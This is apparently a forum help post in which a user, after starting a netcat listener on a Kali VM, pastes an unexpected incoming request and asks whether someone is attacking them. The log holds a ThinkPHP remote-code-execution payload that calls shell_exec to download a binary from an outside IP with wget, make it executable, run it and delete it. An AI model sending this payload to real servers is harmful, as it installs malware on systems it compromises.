I ran the Bash command listener being nc -vv etc from m kali VM and I got back this:
connect to [192.168.1.10] from 114-39-236-143.dynamic-ip.hinet.net [114.39.236.143] 10275
GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=’wget http://5.152.206.169/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0
sent 0, rcvd 320
I hadn’t started the bash on any other device at this stage so very curious to know what it means? Is someone connecting to me to infiltrate instead of the other way around?
Please help as got me a little worried.